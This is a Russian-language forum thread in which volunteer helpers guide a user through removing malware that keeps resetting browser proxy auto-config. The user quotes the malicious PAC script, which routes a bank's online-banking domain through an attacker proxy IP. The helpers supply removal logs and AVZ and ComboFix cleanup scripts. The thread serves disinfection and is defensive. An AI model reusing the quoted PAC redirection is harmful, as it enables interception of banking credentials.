# Форум на русском языке  > Помогите!  >  Везде прописывается URL автоматической настройки сервера прокси

## Bomber

Здравствуйте!

Не могу победить проблему видимо вирус.

У меня во всех браузерах в функционале "URL автоматической настройки сервера прокси" прописывается адрес: ---

Браузеры при этом достаточно медленно загружают страницы, но всё работает.
Если поставить без прокси всё летает.
Но убрать полностью этот адрес не получается, после закрытия и открытия браузера снова, система делает этот адрес по умолчанию.

Как удалось выяснить по этой ссылке расположен следующий скрипт:

function FindProxyForURL(url, host)
{
var proxy_yes = "PROXY 194.60.242.41:13329";
var proxy_no = "DIRECT";
if (dnsDomainIs(host,"retail.payment.ru")) { return proxy_yes; }
return proxy_no;
}

Как видно - трафик на https://retail.payment.ru (это интернет-банк ПромСвязьБанка) будет идти не напрямую, а через указанный прокси 194.60.242.41:13329

WHOIS информация по этому IP-адресу вывела на контакт: [email protected] 

Просил разобраться с организаторами этого прокси-сервера, который создан  очевидно для кражи паролей интернет-банка, и закрыть этот прокси, но в ответ тишина.

Тем времени победить у себя и удалить эту ссылку из браузеров не удаётся...

Надеюсь на Вашу помощь!

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Info_bot

Уважаемый(ая) *Bomber*, спасибо за обращение на наш форум! 

 Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

 Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

----------


## Techno

- *Сделайте лог полного сканирования MBAM*.

----------


## Bomber

Готово!
mbam-log-2012-07-03 (21-11-58).txt

----------


## Techno

Удалите в MBAM:


```
HKCR\AppID\{D96FA298-1BB6-47FC-AD21-72781B744DC3} (Adware.Reklosoft) -> Действие не было предпринято.
HKCR\CLSID\{71E59D37-D7FC-4ED6-BC1D-D13BE02FE6C5} (Trojan.Kerlofost) -> Действие не было предпринято.
HKCR\TypeLib\{2552632F-867D-4052-B836-7F83A5302534} (Trojan.Kerlofost) -> Действие не было предпринято.
HKCR\Interface\{E743CF05-181C-4D72-B4EE-95435ED4B86B} (Trojan.Kerlofost) -> Действие не было предпринято.
HKCR\rs_adw.Helper_bho.1 (Trojan.Kerlofost) -> Действие не было предпринято.
HKCR\rs_adw.Helper_bho (Trojan.Kerlofost) -> Действие не было предпринято.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{71E59D37-D7FC-4ED6-BC1D-D13BE02FE6C5} (Trojan.Kerlofost) -> Действие не было предпринято.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\Stats\{71E59D37-D7FC-4ED6-BC1D-D13BE02FE6C5} (Trojan.Kerlofost) -> Действие не было предпринято.
HKCR\CLSID\{FFFFE708-B832-42F1-BAFF-247753B5E452} (Trojan.BHO) -> Действие не было предпринято.
HKCR\rs_adw.Helper_Bar.1 (Trojan.BHO) -> Действие не было предпринято.
HKLM\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{FFFFE708-B832-42F1-BAFF-247753B5E452} (Trojan.BHO) -> Действие не было предпринято.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\TNod (Trojan.Agent.CK) -> Действие не было предпринято.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NewProduct 1.00 (Backdoor.Agent.CoGen) -> Действие не было предпринято.
HKCR\reklosoft_adw.Helper_Bar (Trojan.Kerlofost) -> Действие не было предпринято.
HKCR\AppID\rs_adw.DLL (Trojan.Agent) -> Действие не было предпринято.
HKCU\Software\SearchHelper (Adware.Reklosoft) -> Действие не было предпринято.

C:\Program Files\Company\NewProduct (Backdoor.Agent.CoGen) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66} (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults\preferences (Trojan.Kerlofost) -> Действие не было предпринято.

C:\Program Files\Company\NewProduct\Uninstall.ini (Backdoor.Agent.CoGen) -> Действие не было предпринято.
C:\Program Files\Company\NewProduct\Uninstall.exe (Backdoor.Agent.CoGen) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome.manifest (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\extension.reg (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\install.rdf (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\extensions.xul (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\logo.png (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\main.js (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\main.xul (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\q.png (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\q_gray.png (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\x.png (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\chrome\content\x_gray.png (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults\preferences\main.js (Trojan.Kerlofost) -> Действие не было предпринято.
C:\Program Files\Common Files\{7445f2b0-cf99-11dd-ad8b-0800200c9a66}\defaults\preferences\main.js.old (Trojan.Kerlofost) -> Действие не было предпринято.
```

C:\Program Files\Spyware Process Detector - знакома программа?

----------


## Bomber

Spyware Process Detector знакома, что-то в ней нужно сделать?
Сейчас планирую сделать что Вы написали про "Удалите в MBAM:".

----------


## Techno

> Spyware Process Detector знакома, что-то в ней нужно сделать?


Ничего, просто мне она не знакома :Smiley: 




> Сейчас планирую сделать что Вы написали про "Удалите в MBAM:".


Делайте...

----------


## Bomber

> Делайте...


Извиняюсь за задержку с ответом!
Не помогло всё сделал как написали, но прокси всё равно автоматом прописывает ту самую пресловутую ссылку....

Прикладываю лог.
mbam-log-2012-07-05 (21-22-32).txt

----------


## Techno

- Выполните в АВЗ:


```
begin
QuarantineFile('C:\Program Files\Company\NewProduct\Uninstall.exe','');
QuarantineFile('C:\WINDOWS\system32\wbem\winmgmt.exe','');
QuarantineFile('C:\WINDOWS\system32\dllcache\winmgmt.exe','');
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.
```


Файл *quarantine.zip* из папки AVZ загрузите по ссылке "*Прислать запрошенный карантин*" вверху темы.

Повторите логи АВЗ и Hijackthis.

----------


## Bomber

> - Выполните в АВЗ:
> 
> 
> ```
> begin
> QuarantineFile('C:\Program Files\Company\NewProduct\Uninstall.exe','');
> QuarantineFile('C:\WINDOWS\system32\wbem\winmgmt.exe','');
> QuarantineFile('C:\WINDOWS\system32\dllcache\winmgmt.exe','');
> CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
> ...


Файлик загрузил.

Логи сейчас буду делать заново я так понимаю, как сделаю приложу.

- - - Добавлено - - -

virusinfo_syscheck.zip

hijackthis.log

Готово.

----------


## Techno

Что с проблемой?

Файлы проверьте на www.virustotal.com:


```
C:\WINDOWS\system32\wbem\winmgmt.exe
C:\WINDOWS\system32\dllcache\winmgmt.exe
```

----------


## Bomber

Проблема на месте, иначе бы я уже поблагодарил за её решение... =)

Запустил файлы на том сайте, а что должно было произойти после проверки этих двух файлом на что обращать внимание?

----------


## Techno

> Запустил файлы на том сайте, а что должно было произойти после проверки этих двух файлом на что обращать внимание?


Результаты проверки должен был выдать.

- Сделайте лог ComboFix.

----------


## Bomber

Прилагаю лог.
log.txt

----------


## Techno

Из файла c:\documents and settings\рс\Application Data\Mozilla\Firefox\Profiles\d73oc6wv.default\use  r.js удалите строку 

```
network.proxy.autoconfig_url - hxxp://reezz.com/Bg43ZV623/proxy.pac
```

- - - Добавлено - - -

Поищите на компьютере файл proxy.pac

----------


## Bomber

Строку удалил.
Поискал файл, но не нашёл.

По прежнему ссылка автоматически прописывается при включении браузера.

----------


## Techno

> Строку удалил.


Она снова не появилась?

Поищите в реестре параметры autoconfigurl...

----------


## Bomber

Снова не появилась, была в таком же файле с раширением .bak удалил ссылку и там эту.

В реестре найденные запросы по слову "autoconfigurl" пусты.

----------


## Techno

Повторите комбофикс.

----------


## Bomber

Чую скоро стану гуру создания логов =)

Прилагаю:
log.txt

----------


## Techno

c:\documents and settings\All Users\Главное меню\Программы\Автозагрузка\Reboot.exe файл Вам знаком?




> В реестре найденные запросы по слову "autoconfigurl" пусты.


Вообще ничего не нашел или нашел, у которых значения пусты?

----------

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

----------


## Bomber

Reboot.exe - файл не знаком.
Зашёл по этому адресу, там этого файла нет, есть только один -> "desktop"
В нём прописан параметр:
[.ShellClassInfo]
[email protected]%SystemRoot%\system32\shell  32.dll,-21787

====
Нашёл по запросу "autoconfigurl" строки, но значения пусты.
Я их видимо ранее нашёл и удалил в них значения ещё когда сам пытался победить проблему.

----------


## Techno

Скопируйте текст ниже в блокнот и сохраните как файл с названием CFScript.txt на диск C:. 


```
KillAll::

File::
c:\windows\pss\Reboot.exe
c:\documents and settings\All Users\Главное меню\Программы\Автозагрузка\Reboot.exe

Driver::


NetSvc::


Folder::


Registry::
[-HKLM\~\startupfolder\C:^Documents and Settings^All Users^Главное меню^Программы^Автозагрузка^Reboot.exe]
FileLook::

DirLook::
Reboot::
```

После сохранения переместите CFScript.txt на пиктограмму ComboFix.exe.

Когда сохранится новый отчет ComboFix, запакуйте ComboFix.txt и прикрепите к сообщению.

Больше в логах ничего необычного нет. 

Почистите кеш браузеров.

Как осуществляется выход в интернет? Чей ip 192.168.1.1?

----------


## Bomber

IP не знаю чей.
Кеш почистил.

Лог прилагаю
log.txt

Ссылка пресловутая во всех браузерах на месте  :Sad:

----------


## regist

> сохраните как файл с названием CFScript.txt *на диск C:.*


скопируйте CFScript.txt и комбофикс в корень диска С и повторите действия из поста №23.

----------


## Bomber

А долго он будет работать?
Там где идёт информация про 10 минут у меня надпись висит уже с семи вечера вчера и по сию минуту, компьютер при этом что-то делает.

Когда запускал всё это с рабочего стола, а не с диска С, весь процесс занимал примерно 10 минут как раз.

----------


## Bomber

Народ, не помогает, система запускается и трое суток пробовал оставлять комп с этой проверкой, но ничего не происходит, по ощущениям что-то делает система, но сколько же суток она будет проверять или что-то делать?
Работать то нельзя пока запущена система.

Компьютер то один!

Ещё есть варианты?

----------


## regist

*Bomber*, сделайте новый лог ComboFix заодно отпишитесь, что с проблемами.

----------


## Bomber

Сделал.
Пресловутая ссылка в прокси по прежнему на месте...

log.txt

----------


## regist

Здравствуйте!

Закройте все программы

Отключите
- ПК от интернета/локалки.
- Антивирус и Файрвол

Выполните скрипт в АВЗ -



```
begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(True);
 QuarantineFile('c:\windows\pss\Reboot.exe','');
 QuarantineFile('c:\documents and settings\All Users\Главное меню\Программы\Автозагрузка\Reboot.exe','');
 DeleteFile('c:\windows\pss\Reboot.exe');
 DeleteFile('c:\documents and settings\All Users\Главное меню\Программы\Автозагрузка\Reboot.exe');
  DelAutorunByFileName('Reboot.exe');
 ExecuteRepair(2);
 ExecuteRepair(3);
 ExecuteRepair(4);
 BC_ImportALL;
 BC_Activate;
 RebootWindows(true);
end.
```

После выполнения скрипта компьютер перезагрузится.

- Сделайте повторные логи по правилам п.2 и 3 раздела Диагностика.(virusinfo_syscheck.zip;hijackthis.log)

----------


## Bomber

Всё сделал.

Ссылка в прокси на месте.

hijackthis.log
virusinfo_syscheck.zip

----------


## regist

*Bomber*, ещё раз объясните где эта ссылка находится и что за ссылка ? никаких настроек прокси у вас не видно. Также проверьте настройки IE там она присутствует ?

----------


## Bomber

Вот смотрите.
В Опере и Эксплорере я отключил эту ссылку, но она не удаляется полностью, т.е. даже если её в этих браузерах удалить, то она всё равно пропишется, но установки в данных браузерах будут отображать то что Вы видите на скринах.

В Fire Fox как бы я не ставил установку без прокси, она всё равно прописывается, но установка и галочка стоит именно на этой ссылке.

opera.jpg
firefox.jpg
ie.jpg

----------


## regist

*Bomber*, попробуйте AVZ - Сервис - поиск данных в реестре, поищите адрес этого сайта. Если что-нибудь найдёт экспортируйте в файл и прикрепите.

- - - Добавлено - - -

Также в найдите в папке профиля Firefox файлы откройте их блокнотом и удалите следующие строчки:

FF - prefs.js: network.proxy.type - 0
FF - user.js: network.proxy.autoconfig_url - hxxp://reezz.com/Bg43ZV623/proxy.pac
FF - user.js: network.proxy.type - 2

если ссылка останется:

1. Набрать в адресной строке about**:config, нажать на Enter и проигнорировать предупреждение о возможной потере лицензии

2. Ввести в строке фильтра reezz.com, отредактировать найденные результаты.

----------


## Bomber

> *Bomber*, попробуйте AVZ - Сервис - поиск данных в реестре, поищите адрес этого сайта. Если что-нибудь найдёт экспортируйте в файл и прикрепите.
> 
> - - - Добавлено - - -
> 
> Также в найдите в папке профиля Firefox файлы откройте их блокнотом и удалите следующие строчки:
> 
> FF - prefs.js: network.proxy.type - 0
> FF - user.js: network.proxy.autoconfig_url - hxxp://reezz.com/Bg43ZV623/proxy.pac
> FF - user.js: network.proxy.type - 2
> ...


Ну вроде бы уже ближе к победе!
AVZ ничего не нашёл.
Помогло что предлагалось под словами "если ссылка останется".
НЕ совсем понял предложения: "Также в найдите в папке профиля Firefox файлы откройте"
Какие именно файлы надо было найти?

В итоге:
1. ссылка в FireFox пропала.
2. ссылку в Opere удалил ещё раз попробовал руками и нажал без прокси и вроде бы она не вернулась.
3. в IE по прежнему ссылка прописывается автоматически даже если я её удаляю руками (прилагаю скрин)

ie.jpg

----------


## regist

> НЕ совсем понял предложения: "Также в найдите в папке профиля Firefox файлы откройте"
> Какие именно файлы надо было найти?


к примеру найти файл _user.js_ и удалить в нём строчку _network.proxy.autoconfig_url - hxxp://reezz.com/Bg43ZV623/proxy.pac_  и т.д. 

Насчёт IE у меня никаких идей нету, кроме как сбросить все настройки и установить по умолчанию.

----------


## Bomber

Давайте сброшу, куда идти чего тыкать?
Осталось то всего ничего победить проблему то!

----------


## regist

http://support.microsoft.com/kb/923737/ru

----------


## CyberHelper

Статистика проведенного лечения:
Получено карантинов: *1*Обработано файлов: *1*В ходе лечения вредоносные программы в карантинах не обнаружены

----------

